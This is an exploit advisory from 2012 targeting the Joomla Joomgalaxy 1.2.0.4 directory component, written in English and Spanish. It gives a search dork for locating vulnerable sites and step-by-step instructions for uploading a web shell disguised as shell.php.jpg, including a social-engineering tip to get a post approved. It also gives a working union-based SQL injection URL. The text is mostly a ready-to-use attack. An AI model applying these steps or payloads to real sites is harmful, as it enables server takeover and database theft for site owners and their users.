Joomla Joomgalaxy component version 1.2.0.4 suffers from remote shell upload and remote SQL injection vulnerabilities.
a888750b9ceb89e199e602d4d15951f68d359c9deab51b4b81286e8927d32431
_______________________________________________________________________________________
Exploit Title: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilites
dork: inurl:com_joomgalaxy
Date: [01-08-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
site: https://poisonsecurity.wordpress.com/
Vendor: https://www.joomgalaxy.com/
Version: 1.2.0.4 (last update on Jul 27, 2012)
License: Commercial $ 149 us
Demo: https://joomgalaxy.com/demo/
Tested on: [Linux(bt5)-Windows(7ultimate)]
Joomgalaxy is a rich, comprehensive directory component brimming with unique features like Entry comparison, Pay per download, Tagging, Email Cloaking, Review and Rating with Multiple Attributes, add Articles to Entries, with many more plus all standard directory features as well.
1. Unrestricted File Upload
1a. Go to this route, Complete the form and login the site
Ingrese a esta ruta, Complete el formulario e ingrese al sitio
https://site/index.php?option=com_users&view=registration
1b. go to the following link and create a new post (sometimes it ask for confirmation of an administrator)
so then create the post with something of social engineering and wait for a confirmation, if not forget this step
vaya a este enlace cree un nuevo anuncio "Algunas veces pide confirmacion de administrador"
asi que cree el anuncio con algo de ingenieria social y espere que confirmen si no omita este paso
https://site/index.php?option=com_joomgalaxy&view=addentry
1c. once the post is published go to the tab images and upload your shell in the following way: shell.php.jpg
Una vez resgistrado el anuncio dirijase a la pestaƱa imagenes y suba su shell de la siguiente forma
shell.php.jpg
1d. Find your shell in the path
Busque su shell en este path
https://site/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg
2. Sql Injection
p0c:
https://site/index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13)
Gretz : devboot, P1l0tcast, ksha, dedalo, etc..
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R" 2012